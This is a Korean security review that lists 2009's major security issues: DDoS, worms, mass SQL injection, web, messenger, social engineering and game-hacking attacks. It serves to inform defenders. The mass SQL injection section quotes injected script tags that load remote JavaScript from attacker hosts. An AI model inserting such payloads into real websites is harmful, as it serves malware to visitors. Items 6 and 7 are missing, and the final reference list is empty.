TeamCR@K이 선정한 2009년 보안 10대 이슈
1. DDoS 공격
가. 설명
2009년은 DDoS공격에 대한 보안 중요성을 생각하게 한 해였다. 특히,2009년 7월 7일 한국, 미국 등 16개국 86여개 사이트에 대해서 DDoS공격이 이루어졌다. 국내 주요 포털 사이트, 금융권, 보안업체 등의 서비스가 중단되면서 엄청난 금전적인 피해뿐 아니라 “IT 대한민국 굴육” 이라는 단어가 따라올 정도였다.
일반적인DDoS 공격의 대부분은 시스템을 무력화 시키는 목적보다는 금전적인 요구에 목적이 있다. DDoS공격을 하기전에 메일과 전화를 통해 협박을 하는 것도 동일한 목적이라고 할 수 있다. 그러나, 이번 DDoS 공격은 금전적인 요구가 없었고, 끝까지 공격자의 목적을 파악하기 여려운 부분이 있었다.
7.7 DDoS 대란 이후, 웹 하드 서비스를 통한 지능화 공격의 확대가 예상된다. 그만큼 기업에게만 대응을 바라기보다는 개인들의 보안 의식이 필요한 시점이다. 2010년 이후에도 DDoS 공격 시도는 꾸준히 증가할거라 예상된다.
2. 악성코드(Worm)
가. 설명
악성코드로 분류되고 있는 Worm은 기존에 메일을 통한 개인PC 감염 공격뿐만 아니라 응용프로그램, 휴대용 저장매체(USB), 모바일 등을 이용한 공격이 급속도로 확산되고 있다.
국내 사용자들의 운영체제로 많이 사용되고 있는 Windows를 포함하여, MS워드, MS 파워포인트 등 MS 취약점을 악용한 공격은 주기적으로 발생하고 있다. 또한, Acrobat의 ActionScript 기능의 취약점을 이용한 공격도 발견되고 있다.
이에 컨피커(Conficker)’, ‘2090 바이러스’등 휴대용 저장 매체(USB)를 이용한 웜 바이러스가 확산 되었다.
2010년에는 스마트폰을 겨냥한 웜 바이러스의 확산이 예상되고, 더욱 다양한 매체와 디바이스를 통한 웜 바이러스의 공격이 예상된다.
3. Mass SQL Injection
가. 설명
대규모 SQL 인젝션 공격(Mass SQL Injection Attack)이란 "봇넷이나 전문 스캐너 프로그램을 이용하여 무차별적으로 웹사이트를 공격하여, 취약한 사이트를의 데이터베이스 데이터를 조작하는 일련의 공격 행위"를 말한다. (참조 :
http://moonslab.com/)
새로운 취약점은 아니며 SQL Injection 취약점을 이용한 새로운 공격 기법이라고 할 수 있다. 이전부터 이런 공격형태는 이루어지고 있었으나, 2008년 중순부터 국내 사이트에서 대량으로 발생하면서 이슈로 떠올랐다. 대부분의 국내 업체에서는2009년까지 이런 공격패턴들을 차단하고, 웹 어플리케이션 소스 수정을 통해서 방어를 하였다.
하지만, 2009년 10월 경부터 해외에서 기존에 “<script src=http://test.co.kr/a.js></script>” 의 삽입 형태에서 “<script src=http://318x.com></script>” 형태, <iframe> 을 포함한 형태 등으로 유도하는 스크립트를 삽입하는 공격들이 대량으로 발견되었다.
이에 대한 대응은 SQL Injection 취약점 대응방안과 동일하며, 소스코드에서 수정하지 않고 IPS 및 웹 방화벽 등에서 일시적으로 차단한 경우에는 다시 공격 대상이 될 수 있기 때문에 근본적인 대응이 필요하다.
2010년 이후에도 새로운 공격 패턴으로 인한 대량 공격이 발생할 수 있다.
[참고사이트 그림 참조]
나. 참고 사이트
(1)
http://blog.scansafe.com/journal/2009/12/9/318x-sql-injection-claims-125000.html
(2)
http://coffeenix.net/bbs/viewtopic.php?p=5978
(3)
http://74.125.155.132/search?q=cache:3pBFy4WaCQUJ:log.mtian.net/%3Fp%3D26032+318x.com+a.htm&cd=3&hl=ko&ct=clnk&gl=kr
4. 웹 어플리케이션 공격
가. 설명
웹 서비스를 통한 공격 형태(OWASP TOP 10, SANS 20 등) 는 관리자 및 운영자, 개발자들한테도 많이 알려져 있다.
매년마다 사용자의 유연성, 편리성을 생각한 서비스가 다양화되면서, 웹 어플리케이션 공격 기법들도 다양화 되고 있다.
IPS (공격 탐지/차단 시스템), 웹 방화벽 등의 방어도 강화되고 있지만, 차단된 공격 패턴을 우회하는 기법들도 꾸준히 알려지고 있다.
2010년 이후에도 웹 어플리케이션 소스 파일에서 원천적으로 수정되지 않는한, 그리고 관리자의 보안 설정 유지, 정기적인 보안 점검이 이루어지지 않는 이상 웹 서비스를 통한 공격은 계속될 거라 예상된다.
5. 메신저를 이용한 공격
가. 설명
메신저의 기능은 사용자들의 기대를 만족시키기 위해서 점점 진화되고 있다. 네트워크를 통한 음성 통화(VoIP), 온라인 결제를 통한 상품 쇼핑 및 선물 주기 등 서비스가 추가된 만큼 이를 이용한 공격은 다양해지고 있다.
예로, 악성 프로그램을 배포하는 사이트 주소를 메신저를 이용하여 다른 사용자들이 클릭하도록 유도하는 방식이 많이 이루어지고 있다.
또한 메신저의 취약점을 이용하여 다른 사용자의 음성 도청을 하는 웜 바이러스도 발견되었다.
8. 사회 공학적(Social Network) 공격
가. 설명
사회 공학적 공격은 시스템이나 네트워크의 취약점을 이용한 해킹기법이 아니라 사회적이고 심리적인 요인을 이용하여 해킹하는 것을 의미한다.
2008년에는 금융권 보이스 피싱이 이슈가 되었으며, 이 공격을 통해 지속적으로 개인의 금전적인 피해가 발생하고 있다.
2009 년에는 다른 사용자의 메신저 계정 정보를 획득하여 친구에 등록되어 있는 사람들 대상으로 메신저 피싱이 이루어지거나, 공공 장소에서 핸드폰을 훔쳐 전화번호에 등록되어 있는 사람들 대상으로 금전적인 갈취가 행해지는 사고가 발생하였다.
사람들의 심리를 이용하는 만큼 개인이 스스로 지켜나가는 방법밖에 없으며, 2010년 이후에도 새로운 공격 사례가 발생하여 사회적인 이슈가 될거라 예상된다.
9. 온라인 게임 해킹 및 툴
가. 설명
국내 온라인 상위 인기 게임은 동시접속자 수십만명에 이를정도로 많은 사용자가 이용하고 있으며, 해외 진출도 활성화 되고 있다.
온라인 게임 내에서 거래되고 있는 아이템은 오프라인에서 현금으로 불법 거래가 이루어져 하나의 불법 시장을 형성하고 있다.
작게는 수만원에서 크게는 수백만, 수천만원의 아이템 거래가 가능하기 때문에 계정 획득을 목적으로 한 공격이 많이 이루어지고 있다.
캐릭터의 능력 향상(레벨업)을 짧은 시간내에 이루기 위해서 “오토 플레이”, 게임을 하지 않고도 실제 게임한것과 같은 효과를 내게 하는 “Non-Client Bot”, 계정 탈취용 트로이 목마 등이 급증하고 있다. 또한, 실제 게임 환경을 동일하게 만들어 놓은 “프리서버”도 나날이 증가하고 게임 회사의 이미지 및 금전적인 피해가 발생하고 있다.
게임 업체에서는 이런 악성 프로그램을 차단하기 위해서 많은 인력과 시간, 자금을 투입하고 있으며, 앞으로도 게임 산업이 발전하는 이상 공격이 계속 될거라 예상된다.
나. 참고 사이트